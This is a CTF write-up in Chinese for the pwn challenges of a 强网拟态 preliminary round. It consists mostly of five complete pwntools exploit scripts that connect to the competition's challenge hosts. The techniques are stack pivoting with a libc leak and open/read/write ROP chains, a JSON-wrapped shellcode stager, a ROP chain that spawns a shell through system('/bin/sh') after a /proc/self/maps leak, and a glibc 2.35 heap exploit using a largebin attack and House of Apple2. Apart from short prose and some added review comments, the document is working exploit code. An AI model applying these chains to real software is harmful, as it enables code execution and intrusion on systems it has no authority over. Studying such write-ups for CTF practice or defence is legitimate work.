强网拟态初赛pwn部分wp

运气还行 进决赛了

PWN

signin

套了个随机数绕过的栈迁移

from pwn import *
from ctypes import *
from struct import pack
banary = "./vuln"                       # challenge binary ("banary" is the author's spelling; used below, so it is kept)
elf = ELF(banary)                       # symbols/PLT/GOT/.bss addresses are taken from this ELF
libc = ELF("./libc.so.6")               # libc shipped with the challenge; libc.sym offsets below refer to this build
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc1=cdll.LoadLibrary("./libc.so.6")   # same libc loaded via ctypes so its srand()/rand() can be replayed locally
ip = ''                                 # unused: the remote endpoint is hard-coded in the else-branch below
port = 0
local = 0                               # 0 -> connect to the remote instance, non-zero -> spawn the binary locally
if local:
    io = process(banary)
else:
    io = remote("pwn-0e0144d48f.challenge.xctf.org.cn", 9999, ssl=True)

# Set after the connection is opened, so debug-level logging starts from here on.
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    """Attach gdb to the running target and block until the user continues (local debugging aid)."""
    gdb.attach(io)
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send data followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for `text`, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for `text`, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte and unpack the last 6 bytes, zero-padded, as a u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def iuu32():
    """Parse the next 10 received characters as a hexadecimal integer."""
    return int(io.recv(10), 16)


def iuu64():
    """Parse the next 6 received characters as a hexadecimal integer."""
    return int(io.recv(6), 16)


def uheap():
    """Unpack 6 received bytes, zero-padded, as a u64."""
    return u64(io.recv(6).ljust(8, b'\x00'))


def lg(data):
    """Log `<name> -> 0x<value>`.

    NOTE(review): evaluates the passed string with eval(); it is only ever
    called with literal variable names in this script.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# Gadget/function addresses inside the challenge binary. They are absolute
# 0x40xxxx values used without any base, so the binary is presumably built
# without PIE (confirm with checksec).
pop_rdi=0x0000000000401893
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
ret=0x000000000040101a          # unused below
pop_rbp=0x000000000040127d
vuln=0x00000000004013C0         # function with the overflowing read(); the first chain returns here for a second round
read_ptr=0x00000000004013CF     # presumably the read() call inside vuln, re-entered with a forged rbp (TODO confirm in disassembly)
leave_ret=0x00000000004013be    # `leave; ret` used for the final stack pivot

payload=b'A'*0x12
s(payload)

# The authentication codes are rand()%100+1 drawn from the challenge's libc.
# Seeding the same libc locally with 0x41414141 (== b"AAAA" as a little-endian
# int, presumably taken from the 'A' buffer sent above) replays the sequence.
# Mitigation note: a seed from /dev/urandom or getrandom() would defeat this.
libc1.srand(0x41414141)

for i in range(100):
    num=libc1.rand() %100 + 1
    print(num)
    ru("Input the authentication code:")
    s(p64(num))

ru(">>")
sl(p32(1))
ru("Note:")
sl(b'youlin')

# Stage 1: 0x100 bytes of buffer + 8 bytes of saved rbp, then
# puts(puts@got) leaks puts' address in libc and the chain returns to vuln.
# No canary value is accounted for, so the frame is presumably unprotected.
payload=b'A'*0x100+b'A'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
sl(payload)
io.recv()
libcbase=u64(io.recv(6).ljust(8,b'\x00'))-0x84420   # 0x84420: offset of puts in the shipped libc (hard-coded, build-specific)
lg("libcbase")
open=libcbase+libc.sym['open']      # NOTE(review): shadows the builtin open() for the rest of the script
read=libcbase+libc.sym['read']
write=libcbase+libc.sym['write']
pop_rsi=libcbase+0x000000000002601f   # libc gadgets; offsets are specific to this libc build
pop_rdx=libcbase+0x0000000000142c92

# Stage 2: forge the saved rbp with a .bss address and re-enter at read_ptr,
# so the next read() fills memory relative to the forged rbp (i.e. in .bss)
# instead of the stack.
payload=b'A'*0x100+p64(elf.bss(0x400)+0x100)+p64(read_ptr)
sl(payload)

# open("flag", 0) / read(3, buf, 0x50) / write(1, buf, 0x50) ROP chain.
# fd 3 assumes only stdin/stdout/stderr are open. "flag\0" is appended so
# that, once the chain sits in .bss, the string presumably lands at 0x404538.
orw=p64(pop_rdi)+p64(0x404538)+p64(pop_rsi)+p64(0)+p64(open)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(read)
orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(write)+b'flag\x00'

# Trailing pop_rbp/read (purpose not visible from here), pad to 0x100, then a
# forged rbp (bss+0x400-8) and `leave; ret` pivot rsp onto the .bss copy of
# the chain — the "stack migration" the write-up refers to.
payload=orw+p64(pop_rbp)+p64(elf.bss(0xb48))+p64(read)
payload=payload.ljust(0x100,b'\x00')+p64(elf.bss(0x400)-0x8)+p64(leave_ret)
s(payload)


ia()

signin_revenge

和上面一题差不多，只是没有随机数校验，直接有栈迁移

from pwn import *
from ctypes import *
from struct import pack
banary = "./vuln"                       # challenge binary ("banary" is the author's spelling; used below, so it is kept)
elf = ELF(banary)                       # symbols/PLT/GOT/.bss addresses are taken from this ELF
libc = ELF("./libc.so.6")               # libc shipped with the challenge; libc.sym offsets below refer to this build
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''                                 # unused: the remote endpoint is hard-coded in the else-branch below
port = 0
local = 0                               # 0 -> connect to the remote instance, non-zero -> spawn the binary locally
if local:
    io = process(banary)
else:
    io = remote("pwn-30cffcb888.challenge.xctf.org.cn", 9999, ssl=True)

# Set after the connection is opened, so debug-level logging starts from here on.
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    """Attach gdb to the running target and block until the user continues (local debugging aid)."""
    gdb.attach(io)
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send data followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for `text`, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for `text`, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte and unpack the last 6 bytes, zero-padded, as a u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def iuu32():
    """Parse the next 10 received characters as a hexadecimal integer."""
    return int(io.recv(10), 16)


def iuu64():
    """Parse the next 6 received characters as a hexadecimal integer."""
    return int(io.recv(6), 16)


def uheap():
    """Unpack 6 received bytes, zero-padded, as a u64."""
    return u64(io.recv(6).ljust(8, b'\x00'))


def lg(data):
    """Log `<name> -> 0x<value>`.

    NOTE(review): evaluates the passed string with eval(); it is only ever
    called with literal variable names in this script.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# Gadget/function addresses inside the challenge binary. They are absolute
# 0x40xxxx values used without any base, so the binary is presumably built
# without PIE (confirm with checksec).
pop_rdi=0x0000000000401393
ret=0x000000000040101a          # unused below
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
vuln=0x00000000004012C0         # function with the overflowing read(); the first chain returns here for a second round
leave_ret=0x00000000004012be    # `leave; ret` used for the final stack pivot
read_ptr=0x0000000004012CF      # presumably the read() call inside vuln, re-entered with a forged rbp (TODO confirm in disassembly)
pop_rbp=0x000000000040117d

ru("lets move and pwn!")
# Stage 1: 0x100 bytes of buffer + 8 bytes of saved rbp, then
# puts(puts@got) leaks puts' address in libc and the chain returns to vuln.
# No canary value is accounted for, so the frame is presumably unprotected.
payload=b'A'*0x100+b'A'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
sl(payload)
io.recv()
libcbase=u64(io.recv(6).ljust(8,b'\x00'))-0x84420   # 0x84420: offset of puts in the shipped libc (hard-coded, build-specific)
lg("libcbase")
open=libcbase+libc.sym['open']      # NOTE(review): shadows the builtin open() for the rest of the script
read=libcbase+libc.sym['read']
write=libcbase+libc.sym['write']
pop_rsi=libcbase+0x000000000002601f   # libc gadgets; offsets are specific to this libc build
pop_rdx=libcbase+0x0000000000142c92

# Stage 2: forge the saved rbp with a .bss address and re-enter at read_ptr,
# so the next read() fills memory relative to the forged rbp (i.e. in .bss).
payload=b'A'*0x100+p64(elf.bss(0x400)+0x100)+p64(read_ptr)
sl(payload)

# open("flag", 0) / read(3, buf, 0x50) / write(1, buf, 0x50) ROP chain.
# fd 3 assumes only stdin/stdout/stderr are open. "flag\0" is appended so
# that, once the chain sits in .bss, the string presumably lands at 0x4044f8.
orw=p64(pop_rdi)+p64(0x4044f8)+p64(pop_rsi)+p64(0)+p64(open)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(read)
orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(write)+b'flag\x00'

# Trailing pop_rbp/read (purpose not visible from here), pad to 0x100, then a
# forged rbp (bss+0x400-8) and `leave; ret` pivot rsp onto the .bss copy of
# the chain.
payload=orw+p64(pop_rbp)+p64(elf.bss(0xb48))+p64(read)
payload=payload.ljust(0x100,b'\x00')+p64(elf.bss(0x400)-0x8)+p64(leave_ret)
s(payload)



ia()

ezcode

套了个json的短shellcode

from pwn import *
from ctypes import *
from struct import pack
banary = "./vuln"                       # challenge binary ("banary" is the author's spelling; used below, so it is kept)
elf = ELF(banary)
# libc = ELF("./libc.so.6")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")   # system libc; only meaningful for the local run (libc is not used below)
ip = ''                                 # unused: the remote endpoint is hard-coded in the else-branch below
port = 0
local = 1                               # as committed: runs the binary locally rather than against the remote instance
if local:
    io = process(banary)
else:
    io = remote("pwn-ba1369d43c.challenge.xctf.org.cn", 9999, ssl=True)

# arch='amd64' also selects the target for asm() further down.
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    """Attach gdb with a breakpoint at image offset 0x18A6 and block until the user continues.

    `$rebase` is a pwndbg/gef helper that adds the loaded image base, so the
    breakpoint works with a PIE binary.
    """
    gdb.attach(io,"b *$rebase(0x00000000000018A6)")
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send data followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for `text`, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for `text`, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte and unpack the last 6 bytes, zero-padded, as a u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def iuu32():
    """Parse the next 10 received characters as a hexadecimal integer."""
    return int(io.recv(10), 16)


def iuu64():
    """Parse the next 6 received characters as a hexadecimal integer."""
    return int(io.recv(6), 16)


def uheap():
    """Unpack 6 received bytes, zero-padded, as a u64."""
    return u64(io.recv(6).ljust(8, b'\x00'))


def lg(data):
    """Log `<name> -> 0x<value>`.

    NOTE(review): evaluates the passed string with eval(); it is only ever
    called with literal variable names in this script.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# First stage: machine code delivered hex-encoded inside a JSON document
# (the "json wrapper" the write-up mentions). The string is 44 hex characters,
# i.e. 22 bytes once decoded by the target — small enough to fit whatever
# length limit the challenge imposes. It presumably acts as a stager that
# read()s the larger second stage below; confirm by disassembling.
shellcode=b'c1e70c66ba070066b80a000f059931c089ce31ff0f05'
print(hex(len(shellcode)))   # length of the hex text (0x2c), not of the decoded code
payload=b'{"shellcode":"'+shellcode+b'"}'
sl(payload)

# Second stage, assembled for amd64 (per context above):
#   open(0x999800d, 0, 0)      rax = 2; the path string is the "flag\0" sent below
#   read(fd, 0x9998250, 0x100) rax = 0; rdx was zeroed before open and becomes 0x100 here
#   write(1, 0x9998250, 0x100) rax = 1; rdx still holds 0x100
# The fixed 0x9998000-based addresses presumably match where the first stage
# placed the incoming buffer (TODO confirm against the stager).
shellcode = asm('''
mov rdi,0x999800d
xor esi,esi
xor rdx,rdx
xor rax,rax
add rax,2
syscall
mov rdi,rax
mov rsi,0x9998000+0x250
add edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,0x9998000+0x250
mov rax,1
syscall
''')
# "flag\0" padded to 9 bytes precedes the code so the path sits at the offset
# the first instruction expects.
sl(b'flag\x00'.ljust(9,b'\x00')+shellcode)

ia()

qwen

套麻了，有溢出。抬一下 rsp 然后执行 rop，然后用 pwn2 把 flag 复制一份到 flag_read，就可以直接读 flag_read 读出 flag 了

from pwn import *
from ctypes import *
from struct import pack
banary = "./pwn1"                       # challenge binary ("banary" is the author's spelling; used below, so it is kept)
elf = ELF(banary)                       # not used further down; kept as the author left it
libc = ELF("./libc.so.6")               # libc shipped with the challenge; libc.sym/search below refer to this build
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''                                 # unused: the remote endpoint is hard-coded in the else-branch below
port = 0
local = 0                               # 0 -> connect to the remote instance, non-zero -> spawn the binary locally
if local:
    io = process(banary)
else:
    io = remote("pwn-802264e403.challenge.xctf.org.cn", 9999, ssl=True)

# Set after the connection is opened, so debug-level logging starts from here on.
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    """Attach gdb to the running target and block until the user continues (local debugging aid)."""
    gdb.attach(io)
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send data followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for `text`, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for `text`, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte and unpack the last 6 bytes, zero-padded, as a u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def iuu32():
    """Parse the next 10 received characters as a hexadecimal integer."""
    return int(io.recv(10), 16)


def iuu64():
    """Parse the next 6 received characters as a hexadecimal integer."""
    return int(io.recv(6), 16)


def uheap():
    """Unpack 6 received bytes, zero-padded, as a u64."""
    return u64(io.recv(6).ljust(8, b'\x00'))


def lg(data):
    """Log `<name> -> 0x<value>`.

    NOTE(review): evaluates the passed string with eval(); it is only ever
    called with literal variable names in this script.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# The challenge's libc loaded via ctypes. rand() is called without srand(),
# so it yields glibc's fixed first value; the "administrator key" prompt below
# is answered with it, which suggests the target does the same unseeded
# call (TODO confirm in the binary). Mitigation note: keys derived from an
# unseeded PRNG are predictable — use getrandom()/secrets-grade randomness.
libc1 = cdll.LoadLibrary('./libc.so.6')
num=libc1.rand()

# Round 1: five moves at row 0, columns 0..4. Each move is followed by a
# message prompt; the message is 8 filler bytes plus a 2-byte partial
# overwrite (0x1508). What those two bytes corrupt is not visible here.
for i in range(5):
    ru("请输入下棋的位置(行 列):")
    sl("0 "+str(i))
    ru(b'want to say?')
    s(b'a'*0x8+b'\x08\x15')

ru("Do you want to end the game [Y/N]\n")
sl("N")

# Out-of-range coordinates (70, 50) presumably steer execution into the
# administrator path that asks for the key.
ru(":")
sl("70 "+str(50))
ru(b'administrator key')
sl(str(num))

# Once "logged in", the program reads back a path: /proc/self/maps gives the
# program base (first line), the libc base (four lines later) and a stack
# address. Mitigation note: an arbitrary-file read like this turns ASLR off
# for the attacker; validate or restrict the path.
ru("logged in!\n")
sl("/proc/self/maps")
ru("as follows >>\n")
base=int(io.recv(12),16)     # 12 hex digits: the start address of the first mapping
lg("base")
io.recvline()
io.recvline()
io.recvline()
libcbase = int(io.recv(12),16)
lg("libcbase")
system=libcbase+libc.sym['system']
bin_sh=libcbase+next(libc.search(b'/bin/sh\x00'))
pop_rdi=libcbase+0x000000000002164f                 # libc gadget offsets; specific to this libc build
add_rsp=libcbase+0x0000000000154553#add rsp, 0x50 ; pop rbx ; pop rbp ; pop r12 ; ret

for i in range(10):
    io.recvline()

stack = int(io.recv(12),16) + 0x1E518   # computed but not used below
lg("stack")

# Round 2: five more moves. (Loop boundary reconstructed from the flattened
# listing; the blank line below suggests the message is sent once, after the
# five moves, unlike round 1.)
for i in range(5):
    ru("请输入下棋的位置(行 列):")
    sl("0 "+str(i))

# The message overflows into a return address: `add rsp, 0x50; pop; pop; pop;
# ret` lifts rsp over intervening frame data into the chain, and the doubled
# pop_rdi tolerates landing one slot into it / keeps stack alignment for
# system(). Exact frame layout is not visible here.
ru(b'want to say?')
payload=b'a'*0x8+p64(add_rsp)+p64(pop_rdi)+p64(pop_rdi) + p64(bin_sh) + p64(system)
s(payload)
ru("Do you want to end the game [Y/N]\n")
sl("N")
ru("请输入下棋的位置(行 列):")
sl("70 "+str(50))     # out-of-range move again, presumably the trigger for the return

# Post-exploitation steps the author ran by hand (see the write-up text above).
# sl(b'cd /home/ctf')
# sl(b'./pwn2 -c flag_read flag')
# sleep(10)
# sl(b'cat flag_read')


ia()

屏幕截图 2024-10-19 215500

guest book

标准的菜单题，glibc 2.35，有 UAF，直接打 House of Apple2 就可以了

from pwn import *
from ctypes import *
from struct import pack
banary = "./pwn"                        # challenge binary ("banary" is the author's spelling; used below, so it is kept)
elf = ELF(banary)                       # not used further down; kept as the author left it
libc = ELF("./libc.so.6")               # libc shipped with the challenge (2.35 per the write-up); libc.sym offsets refer to it
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''                                 # NOTE(review): left empty, so the non-local branch cannot connect as written
port = 0
local = 0                               # 0 -> remote(ip, port), non-zero -> spawn the binary locally
if local:
    io = process(banary)
else:
    io = remote(ip,port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    """Attach gdb to the running target and block until the user continues (local debugging aid)."""
    gdb.attach(io)
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send data followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for `text`, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for `text`, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte and unpack the last 6 bytes, zero-padded, as a u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def iuu32():
    """Parse the next 10 received characters as a hexadecimal integer."""
    return int(io.recv(10), 16)


def iuu64():
    """Parse the next 6 received characters as a hexadecimal integer."""
    return int(io.recv(6), 16)


def uheap():
    """Unpack 6 received bytes, zero-padded, as a u64."""
    return u64(io.recv(6).ljust(8, b'\x00'))


def lg(data):
    """Log `<name> -> 0x<value>`.

    NOTE(review): evaluates the passed string with eval(); it is only ever
    called with literal variable names in this script.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Hand the connection over to the user."""
    return io.interactive()

def cmd(choice):
    """Pick a menu entry: wait for the `>` prompt, then send `choice` as a line."""
    sla(">", str(choice))

def add(index, size):
    """Menu 1: allocate a note of `size` bytes in slot `index`."""
    cmd(1)
    sla("[+] input your index", str(index))
    sla("[+] input your size", str(size))

def edit(index, content):
    """Menu 2: write `content` (raw bytes, no newline appended) into slot `index`."""
    cmd(2)
    sla("[+] input your index", str(index))
    sa("[+] input your content", content)

def delete(index):
    """Menu 3: free the note in slot `index`."""
    cmd(3)
    sla("[+] input your index", str(index))

def show(index):
    """Menu 4: print the note in slot `index`."""
    cmd(4)
    sla("[+] input your index", str(index))


# Three allocations above tcache/fastbin range, so frees go to the unsorted bin.
add(0,0x520)
add(1,0x500)
add(2,0x510)

delete(0)          # chunk 0 -> unsorted bin; its slot pointer is not cleared (the UAF the write-up relies on)
add(3,0x560)       # larger than chunk 0, so malloc sorts chunk 0 into a large bin
delete(2)          # chunk 2 -> unsorted bin

# UAF read: chunk 0's fd/bk now point into main_arena, leaking libc.
show(0)
io.recv()
libcbase=u64(io.recv(6).ljust(8,b'\x00'))-0x21b110   # 0x21b110: arena list-head offset for this libc build (hard-coded)
lg("libcbase")
one=[0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]   # one_gadget candidates; `onegadget` is not used below
onegadget=libcbase+one[1]
l_next=libcbase+0x3fe890          # unused below (leftover from another approach)
rtld_global=libcbase+0x3fd040     # unused below
system=libcbase+libc.sym['system']
bin_sh=libcbase+next(libc.search(b'/bin/sh\x00'))
setcontext=libcbase+libc.sym['setcontext']+61   # mid-function entry of setcontext, used as a register-loading gadget
_IO_list_all = libcbase + libc.sym['_IO_list_all']
ret=libcbase+0x0000000000029139                 # libc gadget offsets; specific to this build
pop_rdi=libcbase+0x000000000002a3e5
lg("l_next")
lg("rtld_global")

# UAF write then read: overwrite fd/bk with 0x10 filler so show() prints the
# bytes after them (fd_nextsize), which point back at chunk 0 -> heap base.
edit(0,b'A'*0x10)
show(0)
ru(b'A'*0x10)
heapbase=uheap()-0x290
lg("heapbase")
# Large-bin attack: restore fd/bk to the bin head, fd_nextsize -> chunk 0,
# bk_nextsize -> _IO_list_all-0x20. When the next malloc sorts chunk 2 (a
# smaller chunk in the same bin), glibc writes chunk 2's address through
# bk_nextsize->fd_nextsize, i.e. into _IO_list_all. 2.35 has no integrity
# check on large-bin nextsize pointers (safe-linking covers only tcache/fastbins).
edit(0,p64(libcbase+0x21b110)*2+p64(heapbase+0x290)+p64(_IO_list_all-0x20))


add(4,0x590)       # triggers the sort of chunk 2 -> write into _IO_list_all

# Fake FILE laid over chunk 2 (whose header now heads _IO_list_all): with the
# 0x10 cyclic padding, p64(0)+p64(1) land on _IO_write_base/_IO_write_ptr so
# the exit-time flush takes the write path; offset 0xa0 (_wide_data) -> fake_heap
# and offset 0xd8 (vtable) -> _IO_wfile_jumps. Offsets are presumably those of
# glibc 2.35's struct _IO_FILE (TODO confirm against the build).
fake_heap=heapbase+0x1200
IO_wfile_jumps = libcbase + 0x2170c0   # hard-coded offset for this build
lg("fake_heap")
fake_file = b''
fake_file = p64(0)+p64(1)
fake_file = fake_file.ljust(0x80,b'\x00')+p64(fake_heap)
fake_file = fake_file.ljust(0xb8,b'\x00')+p64(IO_wfile_jumps)
payload = cyclic(0x10)+fake_file
edit(2,payload)

# Fake _IO_wide_data / wide vtable placed in chunk 3 (fake_heap presumably
# lies inside it): the vtable slot resolves to setcontext+61, whose register
# block sets rsp to fake_heap+0xf0, where pop_rdi / "/bin/sh" / system sit,
# with a `ret` for stack alignment.
payload = b''
payload = payload.ljust(0x58,b'\x00')+p64(setcontext)
payload = payload.ljust(0xa0,b'\x00')+p64(fake_heap+0xf0)+p64(ret)
payload = payload.ljust(0xc0,b'\x00')+p64(fake_heap)+p64(0)*3+p64(fake_heap-0x10)+p64(0)
payload +=p64(pop_rdi)+p64(bin_sh)+p64(system)
edit(3,payload)

cmd(5)             # menu 5 presumably exits; exit() flushes every FILE on _IO_list_all, reaching the fake one
ia()
